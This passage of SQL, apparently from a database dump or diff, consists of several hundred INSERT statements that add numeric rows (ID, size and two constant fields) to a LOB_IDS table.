VALUES(145,522,1,40) +INSERT INTO LOB_IDS VALUES(146,121,1,40) +INSERT INTO LOB_IDS VALUES(147,4182,1,40) +INSERT INTO LOB_IDS VALUES(148,120,1,40) +INSERT INTO LOB_IDS VALUES(149,7853,1,40) +INSERT INTO LOB_IDS VALUES(150,522,1,40) +INSERT INTO LOB_IDS VALUES(151,527,1,40) +INSERT INTO LOB_IDS VALUES(152,536,1,40) +INSERT INTO LOB_IDS VALUES(153,514,1,40) +INSERT INTO LOB_IDS VALUES(154,527,1,40) +INSERT INTO LOB_IDS VALUES(155,501,1,40) +INSERT INTO LOB_IDS VALUES(156,522,1,40) +INSERT INTO LOB_IDS VALUES(157,522,1,40) +INSERT INTO LOB_IDS VALUES(158,522,1,40) +INSERT INTO LOB_IDS VALUES(159,501,1,40) +INSERT INTO LOB_IDS VALUES(160,511,1,40) +INSERT INTO LOB_IDS VALUES(161,537,1,40) +INSERT INTO LOB_IDS VALUES(162,503,1,40) +INSERT INTO LOB_IDS VALUES(163,519,1,40) +INSERT INTO LOB_IDS VALUES(164,527,1,40) +INSERT INTO LOB_IDS VALUES(165,522,1,40) +INSERT INTO LOB_IDS VALUES(166,522,1,40) +INSERT INTO LOB_IDS VALUES(167,503,1,40) +INSERT INTO LOB_IDS VALUES(168,515,1,40) +INSERT INTO LOB_IDS VALUES(169,519,1,40) +INSERT INTO LOB_IDS VALUES(170,501,1,40) +INSERT INTO LOB_IDS VALUES(171,503,1,40) +INSERT INTO LOB_IDS VALUES(172,522,1,40) +INSERT INTO LOB_IDS VALUES(173,622,1,40) +INSERT INTO LOB_IDS VALUES(174,501,1,40) +INSERT INTO LOB_IDS VALUES(175,519,1,40) +INSERT INTO LOB_IDS VALUES(176,501,1,40) +INSERT INTO LOB_IDS VALUES(177,519,1,40) +INSERT INTO LOB_IDS VALUES(178,562,1,40) +INSERT INTO LOB_IDS VALUES(179,522,1,40) +INSERT INTO LOB_IDS VALUES(180,522,1,40) +INSERT INTO LOB_IDS VALUES(181,527,1,40) +INSERT INTO LOB_IDS VALUES(182,522,1,40) +INSERT INTO LOB_IDS VALUES(183,527,1,40) +INSERT INTO LOB_IDS VALUES(184,522,1,40) +INSERT INTO LOB_IDS VALUES(185,503,1,40) +INSERT INTO LOB_IDS VALUES(186,621,1,40) +INSERT INTO LOB_IDS VALUES(187,519,1,40) +INSERT INTO LOB_IDS VALUES(188,522,1,40) +INSERT INTO LOB_IDS VALUES(189,959,1,40) +INSERT INTO LOB_IDS VALUES(190,522,1,40) +INSERT INTO LOB_IDS VALUES(191,527,1,40) +INSERT INTO LOB_IDS VALUES(192,522,1,40) +INSERT INTO LOB_IDS VALUES(193,522,1,40) +INSERT INTO LOB_IDS VALUES(194,501,1,40) +INSERT INTO LOB_IDS VALUES(195,571,1,40) +INSERT INTO LOB_IDS VALUES(196,522,1,40) +INSERT INTO LOB_IDS VALUES(197,503,1,40) +INSERT INTO LOB_IDS VALUES(198,527,1,40) +INSERT INTO LOB_IDS VALUES(199,527,1,40) +INSERT INTO LOB_IDS VALUES(200,579,1,40) +INSERT INTO LOB_IDS VALUES(201,522,1,40) +INSERT INTO LOB_IDS VALUES(202,522,1,40) +INSERT INTO LOB_IDS VALUES(203,527,1,40) +INSERT INTO LOB_IDS VALUES(204,522,1,40) +INSERT INTO LOB_IDS VALUES(205,564,1,40) +INSERT INTO LOB_IDS VALUES(206,299,1,40) +INSERT INTO LOB_IDS VALUES(207,509,1,40) +INSERT INTO LOB_IDS VALUES(208,310,1,40) +INSERT INTO LOB_IDS VALUES(209,312,1,40) +INSERT INTO LOB_IDS VALUES(210,509,1,40) +INSERT INTO LOB_IDS VALUES(211,529,1,40) +INSERT INTO LOB_IDS VALUES(212,621,1,40) +INSERT INTO LOB_IDS VALUES(213,312,1,40) +INSERT INTO LOB_IDS VALUES(214,527,1,40) +INSERT INTO LOB_IDS VALUES(215,309,1,40) +INSERT INTO LOB_IDS VALUES(216,310,1,40) +INSERT INTO LOB_IDS VALUES(217,311,1,40) +INSERT INTO LOB_IDS VALUES(218,525,1,40) +INSERT INTO LOB_IDS VALUES(219,309,1,40) +INSERT INTO LOB_IDS VALUES(220,529,1,40) +INSERT INTO LOB_IDS VALUES(221,527,1,40) +INSERT INTO LOB_IDS VALUES(222,517,1,40) +INSERT INTO LOB_IDS VALUES(223,310,1,40) +INSERT INTO LOB_IDS VALUES(224,619,1,40) +INSERT INTO LOB_IDS VALUES(225,309,1,40) +INSERT INTO LOB_IDS VALUES(226,529,1,40) +INSERT INTO LOB_IDS VALUES(227,311,1,40) +INSERT INTO LOB_IDS VALUES(228,310,1,40) +INSERT INTO LOB_IDS VALUES(229,311,1,40) +INSERT INTO LOB_IDS VALUES(230,310,1,40) +INSERT INTO LOB_IDS VALUES(231,310,1,40) +INSERT INTO LOB_IDS VALUES(232,310,1,40) +INSERT INTO LOB_IDS VALUES(233,310,1,40) +INSERT INTO LOB_IDS VALUES(234,309,1,40) +INSERT INTO LOB_IDS VALUES(235,310,1,40) +INSERT INTO LOB_IDS VALUES(236,310,1,40) +INSERT INTO LOB_IDS VALUES(237,310,1,40) +INSERT INTO LOB_IDS VALUES(238,310,1,40) +INSERT INTO LOB_IDS VALUES(239,310,1,40) +INSERT INTO LOB_IDS VALUES(240,310,1,40) +INSERT INTO LOB_IDS VALUES(241,310,1,40) +INSERT INTO LOB_IDS VALUES(242,310,1,40) +INSERT INTO LOB_IDS VALUES(243,310,1,40) +INSERT INTO LOB_IDS VALUES(244,310,1,40) +INSERT INTO LOB_IDS VALUES(245,310,1,40) +INSERT INTO LOB_IDS VALUES(246,310,1,40) +INSERT INTO LOB_IDS VALUES(247,535,1,40) +INSERT INTO LOB_IDS VALUES(248,310,1,40) +INSERT INTO LOB_IDS VALUES(249,310,1,40) +INSERT INTO LOB_IDS VALUES(250,525,1,40) +INSERT INTO LOB_IDS VALUES(251,523,1,40) +INSERT INTO LOB_IDS VALUES(252,527,1,40) +INSERT INTO LOB_IDS VALUES(253,621,1,40) +INSERT INTO LOB_IDS VALUES(254,529,1,40) +INSERT INTO LOB_IDS VALUES(255,527,1,40) +INSERT INTO LOB_IDS VALUES(256,527,1,40) +INSERT INTO LOB_IDS VALUES(257,531,1,40) +INSERT INTO LOB_IDS VALUES(258,535,1,40) +INSERT INTO LOB_IDS VALUES(259,533,1,40) +INSERT INTO LOB_IDS VALUES(260,527,1,40) +INSERT INTO LOB_IDS VALUES(261,621,1,40) +INSERT INTO LOB_IDS VALUES(262,535,1,40) +INSERT INTO LOB_IDS VALUES(263,525,1,40) +INSERT INTO LOB_IDS VALUES(264,529,1,40) +INSERT INTO LOB_IDS VALUES(265,531,1,40) +INSERT INTO LOB_IDS VALUES(266,527,1,40) +INSERT INTO LOB_IDS VALUES(267,567,1,40) +INSERT INTO LOB_IDS VALUES(268,516,1,40) +INSERT INTO LOB_IDS VALUES(269,535,1,40) +INSERT INTO LOB_IDS VALUES(270,533,1,40) +INSERT INTO LOB_IDS VALUES(271,529,1,40) +INSERT INTO LOB_IDS VALUES(272,527,1,40) +INSERT INTO LOB_IDS VALUES(273,525,1,40) +INSERT INTO LOB_IDS VALUES(274,529,1,40) +INSERT INTO LOB_IDS VALUES(275,621,1,40) +INSERT INTO LOB_IDS VALUES(276,513,1,40) +INSERT INTO LOB_IDS VALUES(277,529,1,40) +INSERT INTO LOB_IDS VALUES(278,527,1,40) +INSERT INTO LOB_IDS VALUES(279,529,1,40) +INSERT INTO LOB_IDS VALUES(280,537,1,40) +INSERT INTO LOB_IDS VALUES(281,535,1,40) +INSERT INTO LOB_IDS VALUES(282,533,1,40) +INSERT INTO LOB_IDS VALUES(283,573,1,40) +INSERT INTO LOB_IDS VALUES(284,527,1,40) +INSERT INTO LOB_IDS VALUES(285,535,1,40) +INSERT INTO LOB_IDS VALUES(286,488,1,40) +INSERT INTO LOB_IDS VALUES(287,527,1,40) +INSERT INTO LOB_IDS VALUES(288,529,1,40) +INSERT INTO LOB_IDS VALUES(289,529,1,40) +INSERT INTO LOB_IDS VALUES(290,529,1,40) +INSERT INTO LOB_IDS VALUES(291,621,1,40) +INSERT INTO LOB_IDS VALUES(292,535,1,40) +INSERT INTO LOB_IDS VALUES(293,535,1,40) +INSERT INTO LOB_IDS VALUES(294,529,1,40) +INSERT INTO LOB_IDS VALUES(295,527,1,40) +INSERT INTO LOB_IDS VALUES(296,527,1,40) +INSERT INTO LOB_IDS VALUES(297,527,1,40) +INSERT INTO LOB_IDS VALUES(298,621,1,40) +INSERT INTO LOB_IDS VALUES(299,529,1,40) +INSERT INTO LOB_IDS VALUES(300,527,1,40) +INSERT INTO LOB_IDS VALUES(301,529,1,40) +INSERT INTO LOB_IDS VALUES(302,535,1,40) +INSERT INTO LOB_IDS VALUES(303,535,1,40) +INSERT INTO LOB_IDS VALUES(304,535,1,40) +INSERT INTO LOB_IDS VALUES(305,621,1,40) +INSERT INTO LOB_IDS VALUES(306,527,1,40) +INSERT INTO LOB_IDS VALUES(307,535,1,40) +INSERT INTO LOB_IDS VALUES(308,527,1,40) +INSERT INTO LOB_IDS VALUES(309,530,1,40) +INSERT INTO LOB_IDS VALUES(310,529,1,40) +INSERT INTO LOB_IDS VALUES(311,529,1,40) +INSERT INTO LOB_IDS VALUES(312,535,1,40) +INSERT INTO LOB_IDS VALUES(313,529,1,40) +INSERT INTO LOB_IDS VALUES(314,529,1,40) +INSERT INTO LOB_IDS VALUES(315,535,1,40) +INSERT INTO LOB_IDS VALUES(316,614,1,40) +INSERT INTO LOB_IDS VALUES(317,527,1,40) +INSERT INTO LOB_IDS VALUES(318,527,1,40) +INSERT INTO LOB_IDS VALUES(319,527,1,40) +INSERT INTO LOB_IDS VALUES(320,529,1,40) +INSERT INTO LOB_IDS VALUES(321,527,1,40) +INSERT INTO LOB_IDS VALUES(322,541,1,40) +INSERT INTO LOB_IDS VALUES(323,529,1,40) +INSERT INTO LOB_IDS VALUES(324,535,1,40) +INSERT INTO LOB_IDS VALUES(325,535,1,40) +INSERT INTO LOB_IDS VALUES(326,535,1,40) +INSERT INTO LOB_IDS VALUES(327,527,1,40) +INSERT INTO LOB_IDS VALUES(328,535,1,40) +INSERT INTO LOB_IDS VALUES(329,621,1,40) +INSERT INTO LOB_IDS VALUES(330,527,1,40) +INSERT INTO LOB_IDS VALUES(331,529,1,40) +INSERT INTO LOB_IDS VALUES(332,535,1,40) +INSERT INTO LOB_IDS VALUES(333,485,1,40) +INSERT INTO LOB_IDS VALUES(334,527,1,40) +INSERT INTO LOB_IDS VALUES(335,529,1,40) +INSERT INTO LOB_IDS VALUES(336,621,1,40) +INSERT INTO LOB_IDS VALUES(337,529,1,40) +INSERT INTO LOB_IDS VALUES(338,535,1,40) +INSERT INTO LOB_IDS VALUES(339,527,1,40) +INSERT INTO LOB_IDS VALUES(340,525,1,40) +INSERT INTO LOB_IDS VALUES(341,527,1,40) +INSERT INTO LOB_IDS VALUES(342,485,1,40) +INSERT INTO LOB_IDS VALUES(343,621,1,40) +INSERT INTO LOB_IDS VALUES(344,527,1,40) +INSERT INTO LOB_IDS VALUES(345,535,1,40) +INSERT INTO LOB_IDS VALUES(346,533,1,40) +INSERT INTO LOB_IDS VALUES(347,535,1,40) +INSERT INTO LOB_IDS VALUES(348,485,1,40) +INSERT INTO LOB_IDS VALUES(349,621,1,40) +INSERT INTO LOB_IDS VALUES(350,535,1,40) +INSERT INTO LOB_IDS VALUES(351,485,1,40) +INSERT INTO LOB_IDS VALUES(352,530,1,40) +INSERT INTO LOB_IDS VALUES(353,485,1,40) +INSERT INTO LOB_IDS VALUES(354,530,1,40) +INSERT INTO LOB_IDS VALUES(355,485,1,40) +INSERT INTO LOB_IDS VALUES(356,485,1,40) +INSERT INTO LOB_IDS VALUES(357,621,1,40) +INSERT INTO LOB_IDS VALUES(358,573,1,40) +INSERT INTO LOB_IDS VALUES(359,485,1,40) +INSERT INTO LOB_IDS VALUES(360,579,1,40) +INSERT INTO LOB_IDS VALUES(361,485,1,40) +INSERT INTO LOB_IDS VALUES(362,582,1,40) +INSERT INTO LOB_IDS VALUES(363,485,1,40) +INSERT INTO LOB_IDS VALUES(364,485,1,40) +INSERT INTO LOB_IDS VALUES(365,621,1,40) +INSERT INTO LOB_IDS VALUES(366,621,1,40) +INSERT INTO LOB_IDS VALUES(367,485,1,40) +INSERT INTO LOB_IDS VALUES(368,546,1,40) +INSERT INTO LOB_IDS VALUES(369,485,1,40) +INSERT INTO LOB_IDS VALUES(370,621,1,40) +INSERT INTO LOB_IDS VALUES(371,485,1,40) +INSERT INTO LOB_IDS VALUES(372,485,1,40) +INSERT INTO LOB_IDS VALUES(373,621,1,40) +INSERT INTO LOB_IDS VALUES(374,485,1,40) +INSERT INTO LOB_IDS VALUES(375,621,1,40) +INSERT INTO LOB_IDS VALUES(376,485,1,40) +INSERT INTO LOB_IDS VALUES(377,536,1,40) +INSERT INTO LOB_IDS VALUES(378,485,1,40) +INSERT INTO LOB_IDS VALUES(379,448,1,40) +INSERT INTO LOB_IDS VALUES(380,485,1,40) +INSERT INTO LOB_IDS VALUES(381,472,1,40) +INSERT INTO LOB_IDS VALUES(382,453,1,40) +INSERT INTO LOB_IDS VALUES(383,517,1,40) +INSERT INTO LOB_IDS VALUES(384,445,1,40) +INSERT INTO LOB_IDS VALUES(385,517,1,40) +INSERT INTO LOB_IDS VALUES(386,512,1,40) +INSERT INTO LOB_IDS VALUES(387,477,1,40) +INSERT INTO LOB_IDS VALUES(388,517,1,40) +INSERT INTO LOB_IDS VALUES(389,517,1,40) +INSERT INTO LOB_IDS VALUES(390,517,1,40) +INSERT INTO LOB_IDS VALUES(391,519,1,40) +INSERT INTO LOB_IDS VALUES(392,519,1,40) +INSERT INTO LOB_IDS VALUES(393,519,1,40) +INSERT INTO LOB_IDS VALUES(394,501,1,40) +INSERT INTO LOB_IDS VALUES(395,509,1,40) +INSERT INTO LOB_IDS VALUES(396,509,1,40) +INSERT INTO LOB_IDS VALUES(397,519,1,40) +INSERT INTO LOB_IDS VALUES(398,473,1,40) +INSERT INTO LOB_IDS VALUES(399,512,1,40) +INSERT INTO LOB_IDS VALUES(400,297,1,40) +INSERT INTO LOB_IDS VALUES(401,518,1,40) +INSERT INTO LOB_IDS VALUES(402,515,1,40) +INSERT INTO LOB_IDS VALUES(403,519,1,40) +INSERT INTO LOB_IDS VALUES(404,304,1,40) +INSERT INTO LOB_IDS VALUES(405,532,1,40) +INSERT INTO LOB_IDS VALUES(406,529,1,40) +INSERT INTO LOB_IDS VALUES(407,533,1,40) +INSERT INTO LOB_IDS VALUES(408,64,1,40) +INSERT INTO LOB_IDS VALUES(409,309,1,40) +INSERT INTO LOB_IDS VALUES(410,542,1,40) +INSERT INTO LOB_IDS VALUES(411,539,1,40) +INSERT INTO LOB_IDS VALUES(412,543,1,40) +INSERT INTO LOB_IDS VALUES(413,291,1,40) +INSERT INTO LOB_IDS VALUES(414,158,1,40) +INSERT INTO LOB_IDS VALUES(415,458,1,40) +INSERT INTO LOB_IDS VALUES(416,4,1,40) +INSERT INTO LOB_IDS VALUES(417,307,1,40) +INSERT INTO LOB_IDS VALUES(418,315,1,40) +INSERT INTO LOB_IDS VALUES(419,49,1,40) +INSERT INTO LOB_IDS VALUES(420,354,1,40) +INSERT INTO LOB_IDS VALUES(421,4,1,40) +INSERT INTO LOB_IDS VALUES(422,307,1,40) +INSERT INTO LOB_IDS VALUES(423,216,1,40) +INSERT INTO LOB_IDS VALUES(424,215,1,40) +INSERT INTO LOB_IDS VALUES(425,499,1,40) +INSERT INTO LOB_IDS VALUES(426,132,1,40) +INSERT INTO LOB_IDS VALUES(427,307,1,40) +INSERT INTO LOB_IDS VALUES(428,120,1,40) +INSERT INTO LOB_IDS VALUES(429,23870,1,40) +INSERT INTO LOB_IDS VALUES(430,496,1,40) +INSERT INTO LOB_IDS VALUES(431,554,1,40) +INSERT INTO LOB_IDS VALUES(432,589,1,40) +INSERT INTO LOB_IDS VALUES(433,644,1,40) +INSERT INTO LOB_IDS VALUES(434,644,1,40) +INSERT INTO LOB_IDS VALUES(435,574,1,40) +INSERT INTO LOB_IDS VALUES(436,555,1,40) +INSERT INTO LOB_IDS VALUES(437,607,1,40) +INSERT INTO LOB_IDS VALUES(438,311,1,40) +INSERT INTO LOB_IDS VALUES(439,295,1,40) +INSERT INTO LOB_IDS VALUES(440,551,1,40) +INSERT INTO LOB_IDS VALUES(441,298,1,40) +INSERT INTO LOB_IDS VALUES(442,520,1,40) +INSERT INTO LOB_IDS VALUES(443,604,1,40) +INSERT INTO LOB_IDS VALUES(444,543,1,40) +INSERT INTO LOB_IDS VALUES(445,310,1,40) +INSERT INTO LOB_IDS VALUES(446,347,1,40) +INSERT INTO LOB_IDS VALUES(447,526,1,40) +INSERT INTO LOB_IDS VALUES(448,619,1,40) +INSERT INTO LOB_IDS VALUES(449,552,1,40) +INSERT INTO LOB_IDS VALUES(450,297,1,40) +INSERT INTO LOB_IDS VALUES(451,508,1,40) +INSERT INTO LOB_IDS VALUES(452,219,1,40) +INSERT INTO LOB_IDS VALUES(453,336,1,40) +INSERT INTO LOB_IDS VALUES(454,960,1,40) +INSERT INTO LOB_IDS VALUES(455,623,1,40) +INSERT INTO LOB_IDS VALUES(456,524,1,40) +INSERT INTO LOB_IDS VALUES(457,306,1,40) +INSERT INTO LOB_IDS VALUES(458,308,1,40) +INSERT INTO LOB_IDS VALUES(459,607,1,40) +INSERT INTO LOB_IDS VALUES(460,544,1,40) +INSERT INTO LOB_IDS VALUES(461,389,1,40) +INSERT INTO LOB_IDS VALUES(462,695,1,40) +INSERT INTO LOB_IDS VALUES(463,692,1,40) +INSERT INTO LOB_IDS VALUES(464,311,1,40) +INSERT INTO LOB_IDS VALUES(465,314,1,40) +INSERT INTO LOB_IDS VALUES(466,317,1,40) +INSERT INTO LOB_IDS VALUES(467,702,1,40) +INSERT INTO LOB_IDS VALUES(468,213,1,40) +INSERT INTO LOB_IDS VALUES(469,617,1,40) +INSERT INTO LOB_IDS VALUES(470,547,1,40) +INSERT INTO LOB_IDS VALUES(471,518,1,40) +INSERT INTO LOB_IDS VALUES(472,620,1,40) +INSERT INTO LOB_IDS VALUES(473,296,1,40) +INSERT INTO LOB_IDS VALUES(474,299,1,40) +INSERT INTO LOB_IDS VALUES(475,644,1,40) +INSERT INTO LOB_IDS VALUES(476,543,1,40) +INSERT INTO LOB_IDS VALUES(477,524,1,40) +INSERT INTO LOB_IDS VALUES(478,543,1,40) +INSERT INTO LOB_IDS VALUES(479,543,1,40) +INSERT INTO LOB_IDS VALUES(480,516,1,40) +INSERT INTO LOB_IDS VALUES(481,524,1,40) +INSERT INTO LOB_IDS VALUES(482,644,1,40) +INSERT INTO LOB_IDS VALUES(483,624,1,40) +INSERT INTO LOB_IDS VALUES(484,519,1,40) +INSERT INTO LOB_IDS VALUES(485,524,1,40) +INSERT INTO LOB_IDS VALUES(486,49,1,40) +INSERT INTO LOB_IDS VALUES(487,354,1,40) +INSERT INTO LOB_IDS VALUES(488,519,1,40) +INSERT INTO LOB_IDS VALUES(489,524,1,40) +INSERT INTO LOB_IDS VALUES(490,519,1,40) +INSERT INTO LOB_IDS VALUES(491,543,1,40) +INSERT INTO LOB_IDS VALUES(492,607,1,40) +INSERT INTO LOB_IDS VALUES(493,522,1,40) +INSERT INTO LOB_IDS VALUES(494,522,1,40) +INSERT INTO LOB_IDS VALUES(495,524,1,40) +INSERT INTO LOB_IDS VALUES(496,522,1,40) +INSERT INTO LOB_IDS VALUES(497,522,1,40) +INSERT INTO LOB_IDS VALUES(498,543,1,40) +INSERT INTO LOB_IDS VALUES(499,607,1,40) +INSERT INTO LOB_IDS VALUES(500,524,1,40) +INSERT INTO LOB_IDS VALUES(501,602,1,40) +INSERT INTO LOB_IDS VALUES(502,522,1,40) +INSERT INTO LOB_IDS VALUES(503,516,1,40) +INSERT INTO LOB_IDS VALUES(504,516,1,40) +INSERT INTO LOB_IDS VALUES(505,524,1,40) +INSERT INTO LOB_IDS VALUES(506,524,1,40) +INSERT INTO LOB_IDS VALUES(507,644,1,40) +INSERT INTO LOB_IDS VALUES(508,543,1,40) +INSERT INTO LOB_IDS VALUES(509,543,1,40) +INSERT INTO LOB_IDS VALUES(510,516,1,40) +INSERT INTO LOB_IDS VALUES(511,524,1,40) +INSERT INTO LOB_IDS VALUES(512,524,1,40) +INSERT INTO LOB_IDS VALUES(513,524,1,40) +INSERT INTO LOB_IDS VALUES(514,516,1,40) +INSERT INTO LOB_IDS VALUES(515,644,1,40) +INSERT INTO LOB_IDS VALUES(516,524,1,40) +INSERT INTO LOB_IDS VALUES(517,516,1,40) +INSERT INTO LOB_IDS VALUES(518,543,1,40) +INSERT INTO LOB_IDS VALUES(519,516,1,40) +INSERT INTO LOB_IDS VALUES(520,522,1,40) +INSERT INTO LOB_IDS VALUES(521,519,1,40) +INSERT INTO LOB_IDS VALUES(522,543,1,40) +INSERT INTO LOB_IDS VALUES(523,543,1,40) +INSERT INTO LOB_IDS VALUES(524,524,1,40) +INSERT INTO LOB_IDS VALUES(525,559,1,40) +INSERT INTO LOB_IDS VALUES(526,537,1,40) +INSERT INTO LOB_IDS VALUES(527,542,1,40) +INSERT INTO LOB_IDS VALUES(528,536,1,40) +INSERT INTO LOB_IDS VALUES(529,524,1,40) +INSERT INTO LOB_IDS VALUES(530,519,1,40) +INSERT INTO LOB_IDS VALUES(531,699,1,40) +INSERT INTO LOB_IDS VALUES(532,519,1,40) +INSERT INTO LOB_IDS VALUES(533,538,1,40) +INSERT INTO LOB_IDS VALUES(534,560,1,40) +INSERT INTO LOB_IDS VALUES(535,546,1,40) +INSERT INTO LOB_IDS VALUES(536,522,1,40) +INSERT INTO LOB_IDS VALUES(537,534,1,40) +INSERT INTO LOB_IDS VALUES(538,543,1,40) +INSERT INTO LOB_IDS VALUES(539,645,1,40) +INSERT INTO LOB_IDS VALUES(540,524,1,40) +INSERT INTO LOB_IDS VALUES(541,516,1,40) +INSERT INTO LOB_IDS VALUES(542,696,1,40) +INSERT INTO LOB_IDS VALUES(543,522,1,40) +INSERT INTO LOB_IDS VALUES(544,542,1,40) +INSERT INTO LOB_IDS VALUES(545,519,1,40) +INSERT INTO LOB_IDS VALUES(546,519,1,40) +INSERT INTO LOB_IDS VALUES(547,525,1,40) +INSERT INTO LOB_IDS VALUES(548,520,1,40) +INSERT INTO LOB_IDS VALUES(549,543,1,40) +INSERT INTO LOB_IDS VALUES(550,721,1,40) +INSERT INTO LOB_IDS VALUES(551,585,1,40) +INSERT INTO LOB_IDS VALUES(552,543,1,40) +INSERT INTO LOB_IDS VALUES(553,522,1,40) +INSERT INTO LOB_IDS VALUES(554,644,1,40) +INSERT INTO LOB_IDS VALUES(555,717,1,40) +INSERT INTO LOB_IDS VALUES(556,522,1,40) +INSERT INTO LOB_IDS VALUES(557,543,1,40) +INSERT INTO LOB_IDS VALUES(558,524,1,40) +INSERT INTO LOB_IDS VALUES(559,594,1,40) +INSERT INTO LOB_IDS VALUES(560,526,1,40) +INSERT INTO LOB_IDS VALUES(561,522,1,40) +INSERT INTO LOB_IDS VALUES(562,543,1,40) +INSERT INTO LOB_IDS VALUES(563,543,1,40) +INSERT INTO LOB_IDS VALUES(564,717,1,40) +INSERT INTO LOB_IDS VALUES(565,543,1,40) +INSERT INTO LOB_IDS VALUES(566,524,1,40) +INSERT INTO LOB_IDS VALUES(567,519,1,40) +INSERT INTO LOB_IDS VALUES(568,516,1,40) +INSERT INTO LOB_IDS VALUES(569,717,1,40) +INSERT INTO LOB_IDS VALUES(570,602,1,40) +INSERT INTO LOB_IDS VALUES(571,516,1,40) +INSERT INTO LOB_IDS VALUES(572,717,1,40) +INSERT INTO LOB_IDS VALUES(573,587,1,40) +INSERT INTO LOB_IDS VALUES(574,524,1,40) +INSERT INTO LOB_IDS VALUES(575,524,1,40) +INSERT INTO LOB_IDS VALUES(576,524,1,40) +INSERT INTO LOB_IDS VALUES(577,543,1,40) +INSERT INTO LOB_IDS VALUES(578,516,1,40) +INSERT INTO LOB_IDS VALUES(579,717,1,40) +INSERT INTO LOB_IDS VALUES(580,524,1,40) +INSERT INTO LOB_IDS VALUES(581,644,1,40) +INSERT INTO LOB_IDS VALUES(582,516,1,40) +INSERT INTO LOB_IDS VALUES(583,519,1,40) +INSERT INTO LOB_IDS VALUES(584,524,1,40) +INSERT INTO LOB_IDS VALUES(585,642,1,40) +INSERT INTO LOB_IDS VALUES(586,717,1,40) +INSERT INTO LOB_IDS VALUES(587,543,1,40) +INSERT INTO LOB_IDS VALUES(588,717,1,40) +INSERT INTO LOB_IDS VALUES(589,644,1,40) +INSERT INTO LOB_IDS VALUES(590,543,1,40) +INSERT INTO LOB_IDS VALUES(591,717,1,40) +INSERT INTO LOB_IDS VALUES(592,644,1,40) +INSERT INTO LOB_IDS VALUES(593,522,1,40) +INSERT INTO LOB_IDS VALUES(594,717,1,40) +INSERT INTO LOB_IDS VALUES(595,590,1,40) +INSERT INTO LOB_IDS VALUES(596,519,1,40) +INSERT INTO LOB_IDS VALUES(597,717,1,40) +INSERT INTO LOB_IDS VALUES(598,644,1,40) +INSERT INTO LOB_IDS VALUES(599,596,1,40) +INSERT INTO LOB_IDS VALUES(600,717,1,40) +INSERT INTO LOB_IDS VALUES(601,644,1,40) +INSERT INTO LOB_IDS VALUES(602,717,1,40) +INSERT INTO LOB_IDS VALUES(603,644,1,40) +INSERT INTO LOB_IDS VALUES(604,719,1,40) +INSERT INTO LOB_IDS VALUES(605,719,1,40) +INSERT INTO LOB_IDS VALUES(606,644,1,40) +INSERT INTO LOB_IDS VALUES(607,553,1,40) +INSERT INTO LOB_IDS VALUES(608,717,1,40) +INSERT INTO LOB_IDS VALUES(609,637,1,40) +INSERT INTO LOB_IDS VALUES(610,717,1,40) +INSERT INTO LOB_IDS VALUES(611,564,1,40) +INSERT INTO LOB_IDS VALUES(612,717,1,40) +INSERT INTO LOB_IDS VALUES(613,641,1,40) +INSERT INTO LOB_IDS VALUES(614,717,1,40) +INSERT INTO LOB_IDS VALUES(615,645,1,40) +INSERT INTO LOB_IDS VALUES(616,717,1,40) +INSERT INTO LOB_IDS VALUES(617,585,1,40) +INSERT INTO LOB_IDS VALUES(618,719,1,40) +INSERT INTO LOB_IDS VALUES(619,554,1,40) +INSERT INTO LOB_IDS VALUES(620,717,1,40) +INSERT INTO LOB_IDS VALUES(621,644,1,40) +INSERT INTO LOB_IDS VALUES(622,717,1,40) +INSERT INTO LOB_IDS VALUES(623,644,1,40) +INSERT INTO LOB_IDS VALUES(624,717,1,40) +INSERT INTO LOB_IDS VALUES(625,556,1,40) +INSERT INTO LOB_IDS VALUES(626,719,1,40) +INSERT INTO LOB_IDS VALUES(627,717,1,40) +INSERT INTO LOB_IDS VALUES(628,553,1,40) +INSERT INTO LOB_IDS VALUES(629,644,1,40) +INSERT INTO LOB_IDS VALUES(630,717,1,40) +INSERT INTO LOB_IDS VALUES(631,569,1,40) +INSERT INTO LOB_IDS VALUES(632,717,1,40) +INSERT INTO LOB_IDS VALUES(633,644,1,40) +INSERT INTO LOB_IDS VALUES(634,717,1,40) +INSERT INTO LOB_IDS VALUES(635,644,1,40) +INSERT INTO LOB_IDS VALUES(636,719,1,40) +INSERT INTO LOB_IDS VALUES(637,644,1,40) +INSERT INTO LOB_IDS VALUES(638,717,1,40) +INSERT INTO LOB_IDS VALUES(639,559,1,40) +INSERT INTO LOB_IDS VALUES(640,717,1,40) +INSERT INTO LOB_IDS VALUES(641,553,1,40) +INSERT INTO LOB_IDS VALUES(642,717,1,40) +INSERT INTO LOB_IDS VALUES(643,644,1,40) +INSERT INTO LOB_IDS VALUES(644,717,1,40) +INSERT INTO LOB_IDS VALUES(645,596,1,40) +INSERT INTO LOB_IDS VALUES(646,717,1,40) +INSERT INTO LOB_IDS VALUES(647,602,1,40) +INSERT INTO LOB_IDS VALUES(648,717,1,40) +INSERT INTO LOB_IDS VALUES(649,605,1,40) +INSERT INTO LOB_IDS VALUES(650,717,1,40) +INSERT INTO LOB_IDS VALUES(651,644,1,40) +INSERT INTO LOB_IDS VALUES(652,700,1,40) +INSERT INTO LOB_IDS VALUES(653,524,1,40) +INSERT INTO LOB_IDS VALUES(654,644,1,40) +INSERT INTO LOB_IDS VALUES(655,543,1,40) +INSERT INTO LOB_IDS VALUES(656,610,1,40) +INSERT INTO LOB_IDS VALUES(657,522,1,40) +INSERT INTO LOB_IDS VALUES(658,595,1,40) +INSERT INTO LOB_IDS VALUES(659,644,1,40) +INSERT INTO LOB_IDS VALUES(660,543,1,40) +INSERT INTO LOB_IDS VALUES(661,607,1,40) +INSERT INTO LOB_IDS VALUES(662,524,1,40) +INSERT INTO LOB_IDS VALUES(663,644,1,40) +INSERT INTO LOB_IDS VALUES(664,519,1,40) +INSERT INTO LOB_IDS VALUES(665,644,1,40) +INSERT INTO LOB_IDS VALUES(666,516,1,40) +INSERT INTO LOB_IDS VALUES(667,570,1,40) +INSERT INTO LOB_IDS VALUES(668,584,1,40) +INSERT INTO LOB_IDS VALUES(669,644,1,40) +INSERT INTO LOB_IDS VALUES(670,644,1,40) +INSERT INTO LOB_IDS VALUES(671,558,1,40) +INSERT INTO LOB_IDS VALUES(672,471,1,40) +INSERT INTO LOB_IDS VALUES(673,495,1,40) +INSERT INTO LOB_IDS VALUES(674,476,1,40) +INSERT INTO LOB_IDS VALUES(675,468,1,40) +INSERT INTO LOB_IDS VALUES(676,468,1,40) +INSERT INTO LOB_IDS VALUES(677,500,1,40) +INSERT INTO LOB_IDS VALUES(678,64,1,40) +INSERT INTO LOB_IDS VALUES(679,307,1,40) +INSERT INTO LOB_IDS VALUES(680,166,1,40) 